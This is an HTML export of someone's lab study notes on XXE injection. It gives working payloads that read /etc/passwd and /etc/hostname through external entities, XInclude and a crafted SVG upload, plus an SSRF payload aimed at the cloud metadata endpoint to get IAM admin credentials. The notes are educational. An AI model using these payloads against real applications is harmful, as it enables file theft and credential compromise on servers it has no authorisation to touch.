<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Web app - (XXE) injection</title><style>
/* cspell:disable-file */
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	padding-inline-start: 0;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

.page-description {
    margin-bottom: 2em;
}

.simple-table {
	margin-top: 1em;
	font-size: 0.875rem;
	empty-cells: show;
}
.simple-table td {
	height: 29px;
	min-width: 120px;
}

.simple-table th {
	height: 29px;
	min-width: 120px;
}

.simple-table-header-color {
	background: rgb(247, 246, 243);
	color: black;
}
.simple-table-header {
	font-weight: 500;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	max-height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code-wrap {
	white-space: pre-wrap;
	word-break: break-all;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark {
	text-decoration: none;
	max-height: 8em;
	padding: 0;
	display: flex;
	width: 100%;
	align-items: stretch;
}

.bookmark-title {
	font-size: 0.85em;
	overflow: hidden;
	text-overflow: ellipsis;
	height: 1.75em;
	white-space: nowrap;
}

.bookmark-text {
	display: flex;
	flex-direction: column;
}

.bookmark-info {
	flex: 4 1 180px;
	padding: 12px 14px 14px;
	display: flex;
	flex-direction: column;
	justify-content: space-between;
}

.bookmark-image {
	width: 33%;
	flex: 1 1 180px;
	display: block;
	position: relative;
	object-fit: cover;
	border-radius: 1px;
}

.bookmark-description {
	color: rgba(55, 53, 47, 0.6);
	font-size: 0.75em;
	overflow: hidden;
	max-height: 4.5em;
	word-break: break-word;
}

.bookmark-href {
	font-size: 0.75em;
	margin-top: 0.25em;
}

.sans { font-family: ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, ui-serif, serif; }
.mono { font-family: iawriter-mono, Nitti, Menlo, Courier, monospace; }
.pdf .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK JP'; }
.pdf:lang(zh-CN) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC'; }
.pdf:lang(zh-TW) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK TC'; }
.pdf:lang(ko-KR) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK KR'; }
.pdf .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK JP'; }
.pdf:lang(zh-CN) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC'; }
.pdf:lang(zh-TW) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK TC'; }
.pdf:lang(ko-KR) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK KR'; }
.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK JP'; }
.pdf:lang(zh-CN) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK SC'; }
.pdf:lang(zh-TW) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK TC'; }
.pdf:lang(ko-KR) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK KR'; }
.pdf .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK JP'; }
.pdf:lang(zh-CN) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC'; }
.pdf:lang(zh-TW) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK TC'; }
.pdf:lang(ko-KR) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK KR'; }
.highlight-default {
	color: rgba(55, 53, 47, 1);
}
.highlight-gray {
	color: rgba(120, 119, 116, 1);
	fill: rgba(120, 119, 116, 1);
}
.highlight-brown {
	color: rgba(159, 107, 83, 1);
	fill: rgba(159, 107, 83, 1);
}
.highlight-orange {
	color: rgba(217, 115, 13, 1);
	fill: rgba(217, 115, 13, 1);
}
.highlight-yellow {
	color: rgba(203, 145, 47, 1);
	fill: rgba(203, 145, 47, 1);
}
.highlight-teal {
	color: rgba(68, 131, 97, 1);
	fill: rgba(68, 131, 97, 1);
}
.highlight-blue {
	color: rgba(51, 126, 169, 1);
	fill: rgba(51, 126, 169, 1);
}
.highlight-purple {
	color: rgba(144, 101, 176, 1);
	fill: rgba(144, 101, 176, 1);
}
.highlight-pink {
	color: rgba(193, 76, 138, 1);
	fill: rgba(193, 76, 138, 1);
}
.highlight-red {
	color: rgba(212, 76, 71, 1);
	fill: rgba(212, 76, 71, 1);
}
.highlight-default_background {
	color: rgba(55, 53, 47, 1);
}
.highlight-gray_background {
	background: rgba(241, 241, 239, 1);
}
.highlight-brown_background {
	background: rgba(244, 238, 238, 1);
}
.highlight-orange_background {
	background: rgba(251, 236, 221, 1);
}
.highlight-yellow_background {
	background: rgba(251, 237, 214, 1);
}
.highlight-teal_background {
	background: rgba(237, 243, 236, 1);
}
.highlight-blue_background {
	background: rgba(231, 243, 248, 1);
}
.highlight-purple_background {
	background: rgba(244, 240, 247, 0.8);
}
.highlight-pink_background {
	background: rgba(249, 238, 243, 0.8);
}
.highlight-red_background {
	background: rgba(253, 235, 236, 1);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(120, 119, 116, 1);
	fill: rgba(120, 119, 116, 1);
}
.block-color-brown {
	color: rgba(159, 107, 83, 1);
	fill: rgba(159, 107, 83, 1);
}
.block-color-orange {
	color: rgba(217, 115, 13, 1);
	fill: rgba(217, 115, 13, 1);
}
.block-color-yellow {
	color: rgba(203, 145, 47, 1);
	fill: rgba(203, 145, 47, 1);
}
.block-color-teal {
	color: rgba(68, 131, 97, 1);
	fill: rgba(68, 131, 97, 1);
}
.block-color-blue {
	color: rgba(51, 126, 169, 1);
	fill: rgba(51, 126, 169, 1);
}
.block-color-purple {
	color: rgba(144, 101, 176, 1);
	fill: rgba(144, 101, 176, 1);
}
.block-color-pink {
	color: rgba(193, 76, 138, 1);
	fill: rgba(193, 76, 138, 1);
}
.block-color-red {
	color: rgba(212, 76, 71, 1);
	fill: rgba(212, 76, 71, 1);
}
.block-color-default_background {
	color: inherit;
	fill: inherit;
}
.block-color-gray_background {
	background: rgba(241, 241, 239, 1);
}
.block-color-brown_background {
	background: rgba(244, 238, 238, 1);
}
.block-color-orange_background {
	background: rgba(251, 236, 221, 1);
}
.block-color-yellow_background {
	background: rgba(251, 237, 214, 1);
}
.block-color-teal_background {
	background: rgba(237, 243, 236, 1);
}
.block-color-blue_background {
	background: rgba(231, 243, 248, 1);
}
.block-color-purple_background {
	background: rgba(244, 240, 247, 0.8);
}
.block-color-pink_background {
	background: rgba(249, 238, 243, 0.8);
}
.block-color-red_background {
	background: rgba(253, 235, 236, 1);
}
.select-value-color-uiBlue { background-color: rgba(35, 131, 226, .07); }
.select-value-color-pink { background-color: rgba(245, 224, 233, 1); }
.select-value-color-purple { background-color: rgba(232, 222, 238, 1); }
.select-value-color-green { background-color: rgba(219, 237, 219, 1); }
.select-value-color-gray { background-color: rgba(227, 226, 224, 1); }
.select-value-color-transparentGray { background-color: rgba(227, 226, 224, 0); }
.select-value-color-translucentGray { background-color: rgba(0, 0, 0, 0.06); }
.select-value-color-orange { background-color: rgba(250, 222, 201, 1); }
.select-value-color-brown { background-color: rgba(238, 224, 218, 1); }
.select-value-color-red { background-color: rgba(255, 226, 221, 1); }
.select-value-color-yellow { background-color: rgba(249, 228, 188, 1); }
.select-value-color-blue { background-color: rgba(211, 229, 239, 1); }
.select-value-color-pageGlass { background-color: undefined; }
.select-value-color-washGlass { background-color: undefined; }

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="2889a0cb-c4d7-4b02-a851-770b95ac4e14" class="page sans"><header><div class="page-header-icon undefined"><span class="icon">🤩</span></div><h1 class="page-title">Web app - <strong>(XXE) injection</strong></h1><p class="page-description"></p></header><div class="page-body"><p id="5c86443e-3b93-42f3-81d4-ec16b2764c51" class="">……………………………………………………………………………………………………………………………………………………………………………………………………………………………….</p><h2 id="6dac20fe-cda4-43fa-9b71-5bd9e2d7b95f" class=""><mark class="highlight-brown_background"><strong>XML External Entity Vulns:</strong></mark></h2><p id="05b5a048-65f0-44ae-bef0-358dbe9fcde8" class=""><mark class="highlight-pink_background">XXE</mark><mark class="highlight-pink">: allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. </mark></p><p id="c1fa0e12-0101-4e50-b97e-5827ac14ae26" class=""><mark class="highlight-teal"><strong>There are 4 types of XXE attacks: </strong></mark></p><ul id="c8e67a25-74d0-41ba-839f-27491a07e8d4" class="bulleted-list"><li style="list-style-type:disc">xxe to retrieve files</li></ul><ul id="4191e7e5-2333-4709-930e-3eed12c1966c" class="bulleted-list"><li style="list-style-type:disc">xxe to preform SSRF</li></ul><ul id="296b2834-d838-4fc9-a961-df1a183eed15" class="bulleted-list"><li style="list-style-type:disc">xxe blind to exfiltrate data out-of-band</li></ul><ul id="44d72f07-07ab-4945-9fbc-9fb327c3527e" class="bulleted-list"><li style="list-style-type:disc">xxe blind to retrieve data via error message</li></ul><h2 id="a25562df-abb4-4416-8112-96e4c61f62c8" class=""><strong>1- </strong><code><strong>Exploiting XXE to retrieve files</strong></code></h2><p id="58a37e62-754a-4a7c-82e9-6b90124ae159" class="">
</p><p id="209fe1dc-af10-48d4-91d9-e1681e6f5f38" class=""><code>To perform an XXE injection attack that retrieves an <br/>arbitrary file from the server&#x27;s filesystem, you need to modify the <br/>submitted XML in two ways:<br/></code></p><ul id="05228a53-26d0-4518-8206-aea3c3f68814" class="bulleted-list"><li style="list-style-type:disc"><code>Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.</code></li></ul><ul id="e391ab20-1e9d-4396-87a6-8150a92fb90b" class="bulleted-list"><li style="list-style-type:disc"><code>Edit a data value in the XML that is returned in the<br/>application&#x27;s response, to make use of the defined external entity.<br/></code></li></ul><p id="3de6138e-f19b-457c-b59d-03f5e7273bdf" class=""><code>For example, suppose a shopping application checks for the <br/>stock level of a product by submitting the following XML to the server:<br/></code></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="13513453-2fc7-4528-8747-1c6d9d65edea" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;stockCheck&gt;&lt;productId&gt;381&lt;/productId&gt;&lt;/stockCheck&gt;</code></pre><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="a0d7e334-422d-4ed3-8a54-faf91c4fbe26" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt; ]&gt;
&lt;stockCheck&gt;&lt;productId&gt;&amp;xxe;&lt;/productId&gt;&lt;/stockCheck&gt;

This XXE payload defines an external entity &amp;xxe; whose value is the contents of the /etc/passwd file </code></pre><figure id="380d60ca-5ef6-4a45-93ab-ab9b4610a9ed" class="image" style="text-align:left"><a href="Untitled.jpeg"><img style="width:576px" src="Untitled.jpeg"/></a></figure><figure id="3f72fc70-05da-4c19-b900-f619fcc2e835" class="image" style="text-align:left"><a href="Untitled%201.jpeg"><img style="width:624px" src="Untitled%201.jpeg"/></a></figure><p id="5b2a5546-5325-4eaf-b16a-5f67b6a5ebc1" class="">
</p><h2 id="35a844d6-be41-4d44-a54f-d48bf03d97f6" class=""><strong>2- </strong><mark class="highlight-brown_background"><strong>Exploiting XXE to perform SSRF attacks</strong></mark></h2><p id="4024272f-5476-4e2c-ae2d-bd922304d67c" class=""><code>Payload:</code></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1a355a9f-d410-4b3f-8c6c-3c85e73b882d" class="code"><code class="language-HTML"> &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;http://internal.vulnerable-website.com/&quot;&gt; ]&gt;</code></pre><p id="0237bdee-764f-4656-b5fa-b5a44db0f8da" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="7e0e5ee4-4138-4558-9986-058a2cf14b28" class="code"><code class="language-Bash">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;http://169.254.169.254/latest/meta-data/iam/security-credentials/admin&quot;&gt; ]&gt;

&lt;stockCheck&gt;
&lt;productId&gt;&amp;xxe;&lt;/productId&gt;
&lt;storeId&gt;1&lt;/storeId&gt;
&lt;/stockCheck&gt;</code></pre><figure id="1ae610c2-4b9b-4434-8f83-c86f00ff96ca" class="image" style="text-align:left"><a href="Untitled%202.jpeg"><img style="width:720px" src="Untitled%202.jpeg"/></a></figure><p id="76e649f1-3d4d-4fae-9179-f9de2e59388b" class="">
</p><h2 id="d98aeded-f511-42f8-ab10-b96f6dc25bde" class=""><strong>3- </strong><mark class="highlight-brown_background"><strong>Exploiting Blind XXE vulnerabilities attacks</strong></mark></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="6c6f7112-72d6-486d-8d7a-1f59bd142069" class="code"><code class="language-Bash" style="white-space:pre-wrap;word-break:break-all">&lt;foo xmlns:xi=&quot;http://www.w3.org/2001/XInclude&quot;&gt;&lt;xi:include parse=&quot;text&quot; href=&quot;file:///etc/passwd&quot;/&gt;&lt;/foo&gt;</code></pre><p id="bd618b2b-cb6c-4675-ba7d-a7e1a4562ca8" class="">cuz we dont control the entire XML document i can&#x27;t define a DTD to launch a classic <a href="https://portswigger.net/web-security/xxe">XXE</a> attack.</p><p id="6fa35767-21c1-40d9-8274-189db17a3dcf" class="">I NEED TO inject an <code>XInclude</code> statement to retrieve the contents of the <code>/etc/passwd</code> file.   </p><figure id="600014c3-6531-4ad7-8e30-9a7b4eb81b60" class="image" style="text-align:left"><a href="Untitled%203.jpeg"><img style="width:576px" src="Untitled%203.jpeg"/></a></figure><figure id="825a0e22-f5ff-4a70-b999-b1a76a0c794d" class="image" style="text-align:left"><a href="Untitled%204.jpeg"><img style="width:576px" src="Untitled%204.jpeg"/></a></figure><p id="1e96767b-2645-4b3f-984b-ff8d14db196b" class="">
</p><h1 id="edcbab8a-0975-4a80-b54c-e2e7bc4e794b" class=""><mark class="highlight-brown_background"><strong>4- XXE attacks via file upload</strong></mark></h1><p id="69e8d2eb-9d1f-4f20-bd0c-1ba35b5ec81d" class=""><mark class="highlight-teal">Examples of XML-based formats are office document formats like DOCX and image formats like SVG.</mark> </p><p id="18461208-f2a2-4642-91c0-bc6d21ea718f" class=""><mark class="highlight-blue_background"><strong>Exploiting XXE via image file upload</strong></mark></p><p id="b98598b2-c0c3-475d-aa10-c28bafa178e8" class="">I created SVG iamge with the under XML and i upload an image that displays the contents of the <code>/etc/hostname</code> file after processing. i should look at the image <br/><br/></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1ccd70b2-e793-4c68-9018-37e8c98d6926" class="code"><code class="language-Bash">&lt;?xml version=&quot;1.0&quot; standalone=&quot;no&quot;?&gt;
&lt;!DOCTYPE svg [
&lt;!ENTITY xxe SYSTEM &quot;file:///etc/hostname&quot;&gt;
]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; width=&quot;100&quot; height=&quot;100&quot;&gt;
&lt;text x=&quot;10&quot; y=&quot;20&quot;&gt;&amp;xxe;&lt;/text&gt;
&lt;/svg&gt;</code></pre><h1 id="c36f3d2f-3a98-48f7-9ce8-bcff5ad2a7d5" class=""><mark class="highlight-brown_background"><strong>5- XXE attacks via modified content type</strong></mark></h1><p id="54458c70-2652-46a0-b9b7-54a5d56ad925" class=""><br/><br/><strong>Most POST requests use a default content type that is generated by HTML forms, such as </strong><code><strong>application/x-www-form-urlencoded</strong></code><strong>. Some web sites expect to receive requests in this format but will tolerate other content types, including XML</strong><br/><br/></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="fff52cb8-f5cc-44b9-aea7-6d662be729f8" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar

